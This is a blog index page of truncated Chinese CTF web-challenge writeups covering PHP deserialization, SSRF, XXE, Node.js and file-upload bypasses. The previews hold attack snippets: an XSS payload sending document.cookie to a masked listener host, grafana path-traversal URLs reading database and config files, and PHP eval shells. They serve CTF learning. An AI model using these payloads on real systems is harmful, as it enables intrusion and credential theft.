刷题记录
文章平均质量分 77
Snakin_ya
苍山负雪,明烛天南
展开
-
[NSSCTF]roud4 web
之后在文件上传页面对字符进行了过滤,我们可以利用zip压缩的方式绕过,压缩后更改后缀为png上传。由于需要绕过wakeup方法,所以需要修改一下属性,修改属性之后同时需要修改签名。这里构造了几层套娃,爆破一下。读一下index.php。...原创 2022-08-09 14:37:26 · 528 阅读 · 1 评论 -
[vsCTF2022]web题目复现
nodejs的eval命令执行,过滤了很多,利用vsCAPTCHA进入页面需要我们输入验证码根据图示:我们需要在每一轮也就是10s内正确输入验证码,总共输入正确1000次,验证码结果为两数相加抓包发现字段,是一段jwt,解码看一下猜测字段含义:第一种思路是将令牌中numCaptchasSolved的值更改为 1000,然后发送它来欺骗服务器,使其认为已经验证了1000次。但是,JWT 是经过签名的,尝试之后发现现有方法都不行,因此必须找到另一种方法。另一种思路是使用 OCR 来检索验证码的内容,但在如此原创 2022-07-13 18:39:08 · 863 阅读 · 0 评论 -
[ctfshow]终极考核wp
页面明文flag首页http头首页查看源码,发现可疑路径访问,需要登录,抓包得到flag进入登陆页面需要输入密码开门,查看js文件,发现密码为输入密码后得到flag备份数据,数据中存在flag在网络测试功能当中可以执行命令,抓包修改测试命令为ls发现,访问得到一串url编码解码得到flag在系统更新处填入645的flag,进行权限验证后远程更新此时抓一下远程更新的包这里存在远程请求文件,很像文件包含,尝试读一下文件确实可以,我们依次读取一下web 643中得到的文件最终flag在当中利用数组绕原创 2022-07-07 17:22:54 · 1898 阅读 · 3 评论 -
[2022 ACTF]web题目复现
查看dockerfile发现题目使用环境为goahead5.1.4,联想到p神对于该漏洞的复现记录,我们有两种方法解题:GoAhead环境变量注入复现踩坑记hack.c编译exp.pyexp.py简单看一下代码逻辑:server.js整个题目通过websockets通信,当api为getflag时传入flagbot这里发现admin登录没有任何限制,那么我们登录admin再传入getflag即可原型链污染:xss:ToLeSion考点:TLS-Poison一篇文章带你读懂 TLS原创 2022-07-06 01:06:34 · 1667 阅读 · 2 评论 -
[2022 CISCN]初赛 web题目复现
源码泄露www.zip,用网上的链子直接打online_crt考点:CVE-2022-1292SSRF项目后端为python+go,其中python部署在外网,go通过python转发到内网先看python,一共有四个路由:为主界面生成一个x509证书调用c_rehash创建证书链接通过代理访问go内网服务再来看go,有一个admin路由,用以重命名证书文件题目的考点为CVE-2022-1292,是c_rehash的一个命令注入漏洞c_rehash是openssl中的一个用perl编写的脚本工具,用于批原创 2022-07-04 13:42:48 · 4147 阅读 · 1 评论 -
[SCUCTF2022]校赛Web出题笔记
前言本次校赛我出了两个题,一个签到一个中等,由于自己的原因导致这两道题都出现了比较离谱的非预期,这里给师傅们谢罪了。checkin<?phperror_reporting(0);$action = $_GET['a']?$_GET['a']:highlight_file(__FILE__);if($action==='inject'){ die('Permission denied');}$lock = call_user_func(($_GET['Y']));if (原创 2022-05-27 22:24:55 · 2024 阅读 · 1 评论 -
[2022DASCTF Apr X FATE 防疫挑战赛]web题目复现
warmup-php给了源码: <?phpspl_autoload_register(function($class){ require("./class/".$class.".php");});highlight_file(__FILE__);error_reporting(0);$action = $_GET['action'];$properties = $_POST['properties'];class Action{ public function __原创 2022-05-02 11:55:55 · 1006 阅读 · 0 评论 -
[MRCTF 2022]web题目复现
WEBwebcheckin一个文件上传点,可以上传webshell但是有检测,这里用二进制绕过<?php class KUYE{ public $DAXW = null; public $LRXV = null; function __construct(){ $this->DAXW = '1100101 1110110 1100001 1101100 101000 100100 1011111 1010000 10011原创 2022-04-27 13:05:48 · 1583 阅读 · 2 评论 -
[*CTF2022]web题目复现及wp
WEBoh-my-grafana搜一下相关漏洞,CVE-2021-43798尝试读取文件/public/plugins/alertlist/../../../../../../../../var/lib/grafana/grafana.db/public/plugins/alertlist/../../../../../../../../etc/grafana/grafana.ini# disable creation of admin user on first start of graf原创 2022-04-21 11:13:20 · 2425 阅读 · 0 评论 -
[SCUCTF]2021 校赛 Web题目复现
web1 入门查看headers2 shell<?php if(isset($_GET['eval'])){ $eval = $_GET['eval']; if(!preg_match('/[0-9]|[a-z]|\^|\+|\||\$|\[|\]|\{|\}|\&|\-/i', $c)){ eval("$eval"); }else{ die("hacker??"); } }else{ highlight_file(__FILE__); }?原创 2022-04-08 22:20:09 · 2036 阅读 · 0 评论 -
[2022红明谷杯]web题目复现
Fan website存在源码泄露,www.zip审计代码,发现一个album路由,且有一个控制器module/Album/src/Controller/AlbumController.php,控制器能实现上传,删除等操作。在上传部分可以看到过滤了preg_match("/<\?|php|HALT\_COMPILER/i", $cont )从这里猜测应该是phar反序列化,那么我们还需要一个触发点,在文件删除操作调用了unlink函数接下来就是找链子,由于提示了laminas组件,原创 2022-04-02 13:00:17 · 1204 阅读 · 0 评论 -
[NSSCTF][羊城杯2020]WEB复现
easycon考点:一句话,base64转图片访问index.php,提示eval post cmd,应该是有一句话,直接蚁剑连接里面有一个bbbbbbbbb.txt,打开发现是一串base64编码发现是jpg头,base64转图片即可easyphp考点:.htaccess <?php $files = scandir('./'); foreach($files as $file) { if(is_file($file)){原创 2022-03-13 23:32:48 · 5285 阅读 · 0 评论 -
[NSSCTF][SCTF 2021]WEB复现
感谢NSSCTF提供复现环境loginmemiddleware.gopackage middlewareimport ( "github.com/gin-gonic/gin")func LocalRequired() gin.HandlerFunc { return func(c *gin.Context) { if c.GetHeader("x-forwarded-for") != "" || c.GetHeader("x-client-ip") != "" { c.Abor原创 2022-03-09 23:32:32 · 1972 阅读 · 0 评论 -
[TQLCTF2022]NETWORK TOOLS复现
考点DNS缓存污染FTP SSRF原理通过在DNS资源记录中插⼊控制字符,从⽽影响DNS的解析结果,或是插⼊不符合域名规范的特殊字符,最终实现DNS缓存污染、SQL 注⼊、XSS等效果。DNS域名系统(Domain Name System,DNS),主要作用是将域名转换为ip地址。它是由一个分层的DNS服务器实现的分布式数据库,也是一个使得主机能够查询分布式数据库的应用层协议。DNS服务器通常是一个运行BIND(Berkeley Internet Name Domain)软件的UNI原创 2022-03-04 23:13:35 · 1773 阅读 · 0 评论 -
[HSC-1th]web wp
Web-sign inrobots.txt协议,fiag_ls_h3re.php开发者工具查看源码即可CLICKmain.js文件中EXEC <?phperror_reporting(0);if(isset($_REQUEST["cmd"])){ $shell = $_REQUEST["cmd"]; $shell = str_ireplace(" ","",$shell); $shell = str_ireplace("\n","",$shell); $原创 2022-02-22 21:31:03 · 1462 阅读 · 0 评论 -
[BUUCTF][VNCTF2022公开赛]web wp
GameV4.0base64解码即可newcalc0镜像为node:lts-alpine,package.json全部为最新包const express = require("express");const path = require("path");const vm2 = require("vm2");const app = express();app.use(express.urlencoded({ extended: true }));app.use(express.json(原创 2022-02-14 19:42:39 · 2572 阅读 · 0 评论 -
[ctfshow]2022 新春欢乐赛 wp
热身开局看到源码,但是却没有显示源码的代码。那么只能是被包含进去了,直接phpinfo搜prepend可以看到包含的文件,查看之得到flag。?f=system("tac etc/ssh/secret/youneverknow/secret.php");web1highlight_file(__FILE__);error_reporting(0);$content = $_GET[content];file_put_contents($content,'<?php exit();'原创 2022-02-09 11:25:12 · 1425 阅读 · 0 评论 -
[BUUCTF][EIS 2019]EzPOP
[EIS 2019]EzPOP<?phperror_reporting(0);class A { protected $store; protected $key; protected $expire; public function __construct($store, $key = 'flysystem', $expire = null) { $this->key = $key; $this->store原创 2022-02-07 17:42:57 · 366 阅读 · 0 评论 -
ctfshow—XSS
web 316(反射型)测试<script>alert(1)</script>,无过滤在服务器上开启监听python3 -m http.server 39543外带数据:<script>location.href="http://x.xx.xx.xx:39543/"+document.cookie</script><script>window.location.href="http://x.xx.xx.xx:39543/"+docu原创 2022-02-05 14:27:06 · 970 阅读 · 1 评论 -
[BUUCTF][BJDCTF2020]ZJCTF,不过如此
考点代码审计命令执行解题打开环境 <?phperror_reporting(0);$text = $_GET["text"];$file = $_GET["file"];if(isset($text)&&(file_get_contents($text,'r')==="I have a dream")){ echo "<br><h1>".file_get_contents($text,'r')."</h1></br&原创 2022-01-24 00:52:35 · 756 阅读 · 0 评论 -
[BUUCTF][网鼎杯 2020 白虎组]PicDown
考点文件读取反弹shell解题在输入框输入数字会在url后面添加参数,利用该参数来尝试文件读取获取启动指定进程的完整命令/proc/self/cmdline获得python2 app.py那么我们再读一下这个文件/proc/self/cwd/app.py得到from flask import Flask, Responsefrom flask import render_templatefrom flask import requestimport osimport u原创 2022-01-24 00:48:29 · 1072 阅读 · 0 评论 -
[BUUCTF][强网杯 2019]Upload
考点代码审计反序列化解题信息搜集首先打开是一个登录框,尝试sql无果注册登录,发现一个文件上传页面先试试文件上传,会将jpg文件转换为png,文件名随机生成dirsearch扫一下目录,有备份文件www.tar.gz解压后是一个tp5的框架代码审计打开文件后有两个断点application/web/controller/Index.php在访问大部分页面时都会调用到login_check方法,该方法将传入的用户信息反序列化,再到数据库中进行检查application/web原创 2022-01-22 01:18:23 · 1925 阅读 · 1 评论 -
ctfshow—Node.js漏洞总结
1 Js大小写绕过ctfshow web334下载源码var findUser = function(name, password){ return users.find(function(item){ return name!=='CTFSHOW' && item.username === name.toUpperCase() && item.password === password; });};需要以账户ctfshow,密码123456登录原创 2021-12-27 10:44:04 · 3898 阅读 · 0 评论 -
[ctfshow内部赛]web wp
签到F12,有register.phpimport requestsimport reurl1 = "http://7fc1279d-6a4b-4fca-968f-235322686f5b.challenge.ctf.show/register.php"url2 = "http://7fc1279d-6a4b-4fca-968f-235322686f5b.challenge.ctf.show/login.php"flag = ''for i in range(1, 50): payl原创 2021-12-03 10:11:36 · 7885 阅读 · 0 评论 -
[天翼杯 2021]esay_eval复现
考点反序列化绕过wakeup魔术方法Redis加载恶意so文件获取shell解题<?phpclass A{ public $code = ""; function __call($method,$args){ eval($this->code); } function __wakeup(){ $this->code = ""; }}class B{ function __d原创 2021-12-01 19:50:47 · 3410 阅读 · 0 评论 -
[极客大挑战2021]web wp
极客大挑战2021Welcome2021F12,提示请使用WELCOME请求方法来请求此网页burp抓包,修改请求方法,发现f1111aaaggg9.php再次请求得到flagDarkTor浏览器访问即可babysql查库:babysqluname=-1' union select database(),2,3,4#&pwd=1查表:jeff,jeffjokesuname=-1' union select group_concat(table_name),2,3,4 fro原创 2021-11-26 22:20:25 · 4128 阅读 · 0 评论 -
[BUUCTF][De1CTF 2019]SSRF Me
考点读取文件的特殊方法哈希扩展解题提示:flag is in ./flag.txt直接给出源码,flask框架#! /usr/bin/env python#encoding=utf-8from flask import Flaskfrom flask import requestimport socketimport hashlibimport urllibimport sysimport osimport jsonreload(sys)sys.setdefaulten原创 2021-11-18 15:47:15 · 387 阅读 · 0 评论 -
[BUUCTF][RoarCTF 2019]Easy Java
[RoarCTF 2019]Easy Java考点WEB-INF/web.xml泄露解题打开是一个登陆界面,根据题目这是一道java题,我们先寻找本页面的信息,除了login之外还有一个help,点击跳转/Download?filename=help.docx内容为java.io.FileNotFoundException:{help.docx}这里引入WEB-INF/web.xml泄露:WEB-INF是Java的WEB应用的安全目录。如果想在页面中直接访问其中的文件,必须通过web.原创 2021-11-18 13:50:22 · 1692 阅读 · 0 评论 -
[BUUCTF][网鼎杯 2018]Fakebook
考点反序列化+ssrf法一(预期解):信息搜集查看robots.txt,发现user.php.bak<?phpclass UserInfo{ public $name = ""; public $age = 0; public $blog = ""; public function __construct($name, $age, $blog) { $this->name = $name; $this-&原创 2021-11-18 13:49:13 · 2299 阅读 · 0 评论 -
[BUUCTF][HCTF 2018]admin
考点flask session伪造unicode欺骗条件竞争法一:flask session伪造查看源码,提示you are not admin,猜测需要admin登录注册登录,网站功能页面很多,依次查看源码,在change password界面发现源码是一个flask框架,进入routes.py,看一下注册和登录部分的源码@app.route('/register', methods = ['GET', 'POST'])def register(): if current_原创 2021-11-16 20:35:50 · 1175 阅读 · 0 评论 -
[BUUCTF][ZJCTF 2019]NiZhuanSiWei
<?php $text = $_GET["text"];$file = $_GET["file"];$password = $_GET["password"];if(isset($text)&&(file_get_contents($text,'r')==="welcome to the zjctf")){ echo "<br><h1>".file_get_contents($text,'r')."</h1></br>.原创 2021-11-15 22:44:06 · 131 阅读 · 0 评论 -
ctfshow—反序列化
简介序列化其实就是将数据转化成一种可逆的数据结构,自然,逆向的过程就叫做反序列化。php 将数据序列化和反序列化会用到两个函数serialize 将对象格式化成有序的字符串unserialize 将字符串还原成原来的对象序列化的目的是方便数据的传输和存储,在PHP中,序列化和反序列化一般用做缓存,比如session缓存,cookie等。常见的魔术方法__construct(),类的构造函数 __destruct(),类的析构函数 __call(),在对象中调用一个不可访问方法时调用原创 2021-11-15 14:26:25 · 2146 阅读 · 0 评论 -
[BUUCTF][蓝帽杯 2021]One Pointer PHP
考点PHP数组溢出绕过open_basedir攻击php-fpm绕过disable functionsSuid提权源码user.php<?phpclass User{ public $count;}?>add_api.php<?phpinclude "user.php";if($user=unserialize($_COOKIE["data"])){ $count[++$user->count]=1; if($count[]=1){ $user原创 2021-11-15 12:34:38 · 1741 阅读 · 0 评论 -
ctfshow—月饼杯(第二届)web wp
web签到<?php//Author:H3h3QAQinclude "flag.php";highlight_file(__FILE__);error_reporting(0);if (isset($_GET["YBB"])) { if (hash("md5", $_GET["YBB"]) == $_GET["YBB"]) { echo "小伙子不错嘛!!flag给你了:" . $flag; } else { echo "偶吼,带黑阔被窝抓到原创 2021-11-13 14:44:06 · 699 阅读 · 0 评论 -
[陇原战疫2021网络安全大赛]eaaasyphp
eaaasyphp<?phpclass Check { public static $str1 = false; public static $str2 = false;}class Esle { public function __wakeup() { Check::$str1 = true; }}class Hint { public function __wakeup(){ $this->原创 2021-11-11 15:32:22 · 3154 阅读 · 0 评论 -
ctfshow—baby杯web wp
web1 baby_captcha首先进入界面,可以知道账号是admin,点击“无脑”进入github链接,里面放了一些弱密码。点击登录进入登录界面,发现验证码是音频文件,所以我们需要绕过验证码。填入信息后抓包。这里我们发现验证码应该是无条件不刷新。无条件不刷新是指在某一时间段内,无论登录失败多少次,只要不刷新页面,就可以无限次的使用同一个验证码来对一个或多个用户帐号进行暴力猜解。换句话说,攻击者可以在同一个会话下,在获得第一个验证码后,后面不再主动触发验证码生成页面,并且一直使用第一个验证码就原创 2021-11-10 20:56:05 · 1084 阅读 · 0 评论 -
[BUUCTF][SUCTF 2019]wp
CheckIn另一篇博客EasySQL考点:堆叠注入fuzz一下过滤了insert,or,order,delete,update,like,union等一些字符,但;没有被过滤,我们可以考虑堆叠注入。query=1;show databases;query=1;use ctf;show tables;由于在最开始测试时发现输入任意数字回显都是Array([0]= > 1),输入字母无回显,猜测查询语句$sql = "select ".$post['query']."||flag原创 2021-10-31 11:09:31 · 214 阅读 · 0 评论 -
[BUUCTF][SUCTF 2019]EasyWeb
[SUCTF 2019]EasyWeb <?phpfunction get_the_flag(){ // webadmin will remove your upload file every 20 min!!!! $userdir = "upload/tmp_".md5($_SERVER['REMOTE_ADDR']); if(!file_exists($userdir)){ mkdir($userdir); } if(!empty($_FILE原创 2021-10-31 01:14:55 · 558 阅读 · 0 评论 -
ctfshow—XXE
XXEXXE:XML External Entity 即外部实体,从安全角度理解成XML External Entity attack 外部实体注入攻击。由于程序在解析输入的XML数据时,解析了攻击者伪造的外部实体而产生的。例如PHP中的simplexml_load 默认情况下会解析外部实体,有XXE漏洞的标志性函数为simplexml_load_string()。XXE可导致读取任意文件,探测内网端口,攻击内网网站,发起拒绝服务攻击,执行系统命令等。Java中的XXE支持sun.net.www.p原创 2021-10-24 17:59:41 · 1045 阅读 · 0 评论 -
[SUCTF 2019]Pythonginx
考点:urlsplit函数处理问题(CVE-2019-9636)nginx重要文件的位置url中的unicode漏洞引发的域名安全问题nginx重要文件位置配置文件存放目录:/etc/nginx主配置文件:/etc/nginx/conf/nginx.conf管理脚本:/usr/lib64/systemd/system/nginx.service模块:/usr/lisb64/nginx/modules应用程序:/usr/sbin/nginx程序默认存放位置:/usr/share/ngi原创 2021-10-17 02:13:53 · 229 阅读 · 0 评论